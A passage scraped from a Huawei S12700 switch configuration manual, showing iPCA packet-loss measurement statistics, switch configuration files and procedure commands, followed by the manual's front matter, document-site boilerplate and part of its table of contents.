127636763 381381 4.513364% 40426386
4.513364%
127636762 381276 4.513435% 40415256
4.513435%
127636761 380961 4.513280% 40381866
4.513280%
127636760 381339 4.513574% 40421934
4.513574%
127636759 381045 4.513270% 40390770
4.513270%
127636758 381088 4.513226% 40395328
4.513226%
127636757 382409 4.513464% 40535354
4.513464%
----End

Configuration Files
#
sysname Switch_1
#
ipfpm tlp 1
#
nqa ipfpm dcp
dcp id 1.1.1.1
instance 1
mcp 2.2.2.2
flow bidirectional source 10.1.1.0 24 destination 10.2.1.0 24
tlp 1 in-point ingress
loss-measure enable continual
#
return

#
sysname Switch_2
#
ipfpm tlp 2
#
nqa ipfpm dcp
dcp id 2.2.2.2
instance 1
mcp 2.2.2.2
flow bidirectional source 10.1.1.0 24 destination 10.2.1.0 24
tlp 2 out-point egress
loss-measure enable continual
#
nqa ipfpm mcp
mcp id 2.2.2.2
instance 1
dcp 1.1.1.1
dcp 2.2.2.2
loss-measure ratio-threshold upper-limit 7.000000 lower-limit 5.000000
#
return
18.4.2 Example for Configuring iPCA to Implement Regional

Network Packet Loss Measurement
iPCA Overview
Packet Conservation Algorithm for Internet (iPCA) technology is used to measure IP network
performance. It directly marks service packets to implement network-level and device-level
packet loss measurements.
In the all-IP era, various services sensitive to packet loss, such as voice and video services, are
transmitted through an IP network. To detect packet loss and find out packet loss points on the
network, Huawei developed iPCA technology. Huawei iPCA has the following
characteristics:
l iPCA applies to both Layer 2 and Layer 3 networks.

l iPCA directly marks service packets to obtain the packet loss ratio and number of lost
packets, without increasing loads on devices.
l iPCA supports packet loss statistics collection on multipoint-to-multipoint networks.

Regional network packet loss measurement: Statistics are not collected on edge devices that
are out of the transit network. This method is applicable to packet loss measurement on a
WAN when an enterprise has multiple networks connected through the WAN or on an
enterprise campus network consisting of devices that do not support iPCA.
Configuration Notes
l A modular switch can support iPCA only after being equipped with an X1E card.
l The prerequisite for network-level packet loss measurement is time synchronization
among all devices. Therefore, before configuring iPCA on devices, configure the
Network Time Protocol (NTP) on the devices.
l In network-level packet loss measurement, target flows can be defined by users.
l In network-level packet loss measurement, the current version can only measure known
IP unicast packets but cannot measure unknown IP unicast packets. If unknown IP
unicast packets are measured, the measurement result may be inaccurate.
l Network-level packet loss measurement is based on target flows. If the packet content is
modified (for example, NAT is performed on packets, packets are encapsulated in
tunnels, and packet priority is changed), the device cannot precisely match the packets,
so the measurement result may be inaccurate.

S12704 V200R008C00, V200R009C00
S12708 and S12712 V200R006C00, V200R007C00, V200R007C20,

V200R008C00, and V200R009C00
As shown in Figure 18-19, an enterprise leases the dedicated line from the carrier to transmit
important services between headquarters and branches over the WAN. The source address
segment is 10.1.1.0/24 and destination address segment is 10.2.0.0/16. The service packets of
the enterprise need to pass a large number of public routing and switching devices of the
carrier. The enterprise considers the dedicated line expensive, and requires the packet loss
data of the WAN to request the carrier to improve service quality.

Figure 18-19 Networking diagram of regional network packet loss measurement

NMS device
Switch_4
Egress
GE1/0/1 GE1/0/1
Leased Line
Switch_1 Switch_3
Branch 1 Egress
Headquarters
GE1/0/1
Egress
Switch_2
Target flow
Branch 2
1. Configure the important service flow (source address segment 10.1.1.0/24 and
destination address segment 10.2.0.0/16) transmitted over the dedicated line as the target
flow. It is a unidirectional service flow.
2. Configure egress devices Switch_1 and Switch_2 as DCPs. Bind GE1/0/1 where the
target flow passes to out-point ingress TLPs of DCPs. Define measurement instance 1 on
Switch_1 and Switch_2 to collect statistics data of the target flow from TLPs.
3. Configure egress device Switch_3 as a DCP. Bind GE1/0/1 where the target flow passes
to in-point egress TLP of the DCP. Define instance 1 on Switch_3 to collect statistics
data of the target flow from TLPs.
4. Configure Switch_4 in the headquarters network management center as the MCP to
collect the statistics data from DCPs. Configure packet loss alarm and clear alarm
thresholds. When the packet loss ratio exceeds 5%, an alarm is reported; when the packet
loss ratio falls below 3%, a clear alarm is reported.
5. Retain the default values of color bit, measurement interval, and UDP port number.
NOTE
Before configuring iPCA to implement regional network packet loss measurement, ensure that static
routes or dynamic routing protocols have been configured to implement network connectivity between
Switch_1, Switch_2, Switch_3, and Switch_4.
Before configuring iPCA to implement regional network packet loss measurement, ensure that NTP has
been configured to implement time synchronization between Switch_1, Switch_2, and Switch_3.
Procedure
configure TLP 1.

[Switch_1] nqa ipfpm dcp //Enable the global DCP function.

[Switch_1-nqa-ipfpm-dcp] dcp id 1.1.1.1 //Set the DCP ID to 1.1.1.1.
[Switch_1-nqa-ipfpm-dcp] instance 1 //Create measurement instance 1 on the DCP.
[Switch_1-nqa-ipfpm-dcp-instance-1] mcp 4.4.4.4 //Associate measurement instance
1 with an MCP.
[Switch_1-nqa-ipfpm-dcp-instance-1] flow forward source 10.1.1.0 24 destination
10.2.0.0 16 //Configure the target flow in measurement instance 1 as a forward
flow with the source address segment 10.1.1.0 and destination address segment
10.2.0.0.
[Switch_1-nqa-ipfpm-dcp-instance-1] tlp 1 out-point ingress //Set the TLP ID to 1
and configure the TLP to color the outgoing target flow. The target flow arrives
at the TLP.
[Switch_1-GigabitEthernet1/0/1] ipfpm tlp 1 //Bind the interface to the TLP.
[Switch_1-nqa-ipfpm-dcp-instance-1] loss-measure enable continual //Enable
continual packet loss measurement.
configure TLP 2.
[Switch_2-nqa-ipfpm-dcp] dcp id 2.2.2.2
[Switch_2-nqa-ipfpm-dcp-instance-1] mcp 4.4.4.4
[Switch_2-nqa-ipfpm-dcp-instance-1] flow forward source 10.1.1.0 24 destination
10.2.0.0 16
[Switch_2-nqa-ipfpm-dcp-instance-1] tlp 2 out-point ingress
[Switch_2-GigabitEthernet1/0/1] ipfpm tlp 2
[Switch_

S12700 Typical Configuration Examples

Hochgeladen von

Dokumentinformationen

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

S12700 Typical Configuration Examples

Hochgeladen von

Copyright:

Verfügbare Formate

S12700 Series Agile Switches

Typical Configuration Examples

HUAWEI TECHNOLOGIES CO., LTD.

Trademarks and Permissions

Huawei Technologies Co., Ltd.

Issue 10 (2016-10-30) Huawei Proprietary and Confidential i

About This Document

Indicates an imminently hazardous situation

Indicates a potentially hazardous situation

Indicates a potentially hazardous situation

Indicates a potentially hazardous situation

NOTE Calls attention to important information,

Issue 10 (2016-10-30) Huawei Proprietary and Confidential ii

Boldface The keywords of a command line are in boldface.

Italic Command arguments are in italics.

[] Items (keywords or arguments) in brackets [ ] are optional.

{ x | y | ... } Optional items are grouped in braces and separated by

[ x | y | ... ] Optional items are grouped in brackets and separated by

{ x | y | ... }* Optional items are grouped in braces and separated by

[ x | y | ... ]* Optional items are grouped in brackets and separated by

&<1-n> The parameter before the & sign can be repeated 1 to n

# A line starting with the # sign is comments.

Interface Numbering Conventions

Issue 10 (2016-10-30) Huawei Proprietary and Confidential iii

Changes in Issue 10 (2016-10-30)

Changes in Issue 09 (2016-08-12)

Changes in Issue 08 (2016-07-22)

Issue 10 (2016-10-30) Huawei Proprietary and Confidential iv

l 16.8 Example for Configuring MAC Address-prioritized Portal Authentication

The following information is modified:

l 10.6.4 Example for Configuring User Authorization Based on ACL or Dynamic

Changes in Issue 07 (2016-06-30)

Changes in Issue 06 (2016-03-16)

l 2.6 Example for Configuring ACU2 and NGFW on Switches

Changes in Issue 05 (2016-01-11)

l 6.3.2 Example for Configuring Interface-based VLAN Assignment (Access Device

Issue 10 (2016-10-30) Huawei Proprietary and Confidential v

The following information is modified:

Changes in Issue 04 (2015-10-23)

Changes in Issue 03 (2015-09-30)

Changes in Issue 02 (2015-07-31)

Changes in Issue 01 (2015-02-12)

Issue 10 (2016-10-30) Huawei Proprietary and Confidential vi

About This Document.....................................................................................................................ii

Issue 10 (2016-10-30) Huawei Proprietary and Confidential vii

2.5.5 Deploying MPLS TE............................................................................................................................................... 122

3 Typical Login Configuration...................................................................................................201

4 Typical File Management Configuration............................................................................. 225

5 Typical Ethernet Interface Configuration.............................................................................249

Issue 10 (2016-10-30) Huawei Proprietary and Confidential viii

6 Typical Ethernet Switching Configuration.......................................................................... 263

7 Typical Examples of MSTP/RRPP/SEP/VBST..................................................................... 381

Issue 10 (2016-10-30) Huawei Proprietary and Confidential ix

7.8 Example for Configuring SEP and MSTP on a Network........................................................................................... 431

8 Typical IP Service Configuration........................................................................................... 463

9 Typical Routing Configuration.............................................................................................. 499

10 Typical User Access and Authentication Configuration................................................. 561

Issue 10 (2016-10-30) Huawei Proprietary and Confidential x

11 Typical Reliability Configuration........................................................................................798

12 Typical Security Configuration............................................................................................ 850

Issue 10 (2016-10-30) Huawei Proprietary and Confidential xi

13 Typical CSS Configuration of Modular Switches............................................................ 885

14 Typical MPLS&VPN Configuration....................................................................................896

15 Typical WLAN-AC Configuration (Applicable to Versions V200R005 to V200R008)